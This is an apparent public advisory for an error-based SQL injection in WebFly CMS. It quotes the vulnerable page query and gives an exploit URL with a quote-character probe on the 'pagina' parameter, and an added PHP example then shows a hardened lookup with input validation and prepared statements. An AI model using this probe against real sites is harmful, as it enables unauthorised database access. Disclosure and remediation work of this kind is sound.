[$] Exploit Title : WebFly CMS Error Based SQL Injection Vulnerability
[$] Versions Affected : ALL
[$] Date : 21-03-2011
[$] Author : MasterGipy
[$] Email : mastergipy [at] gmail.com
[$] Bug : Error Based SQL Injection Vulnerability
[$] Google Dork : [None]

[$] Vulnerable code in /web/inc/paginas/inc.paginas.top.php

    $query_DetalhesPagina = sprintf("SELECT * FROM paginas WHERE ID = %s and Activo = 'Y'", GetSQLValueString($colname_DetalhesPagina, "int"));

[$] Exploit

[+] http://[site]/index.php?pagina=1 <- [ERROR BASED SQL INJECTION]
[+] e.g. http://example.pt/index.php?pagina=2'

[$] Greetings from PORTUGAL ^^
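
A hardened form of the page lookup quoted above, as an added example that is not part of the original advisory and is not WebFly CMS code. The table and column names `paginas`, `ID` and `Activo` come from the quoted query; the function `fetchActivePage()`, the `Titulo` column and the in-memory SQLite database are assumptions made so the script runs stand-alone.

```php
<?php
// Added example, not WebFly CMS code. fetchActivePage() is a hypothetical
// helper; paginas / ID / Activo are taken from the query in the advisory.

function fetchActivePage(PDO $db, $rawId): ?array
{
    // Accept only a positive decimal integer. A value such as "2'" is
    // rejected here, before any SQL text is built.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    try {
        // The placeholder keeps the value out of the SQL text entirely.
        $stmt = $db->prepare("SELECT * FROM paginas WHERE ID = :id AND Activo = 'Y'");
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    } catch (PDOException $e) {
        // Error-based injection depends on database errors reaching the
        // response: log server-side and answer with a generic "not found".
        error_log('page lookup failed: ' . $e->getMessage());
        return null;
    }
}

// Constructed sample data (the Titulo column is an assumption).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE paginas (ID INTEGER PRIMARY KEY, Titulo TEXT, Activo TEXT)");
$db->exec("INSERT INTO paginas VALUES (1, 'Home', 'Y'), (2, 'Contactos', 'Y'), (3, 'Rascunho', 'N')");

// Constructed values for the pagina parameter: valid, inactive, malformed, empty.
foreach (['1', '2', '3', "2'", 'abc', ''] as $pagina) {
    $page = fetchActivePage($db, $pagina);
    printf("pagina=%-6s -> %s\n", var_export($pagina, true), $page ? $page['Titulo'] : 'not found');
}
```

In production the same effect on error output also needs `display_errors` turned off in the PHP configuration, so that a failing query never prints database messages into the page.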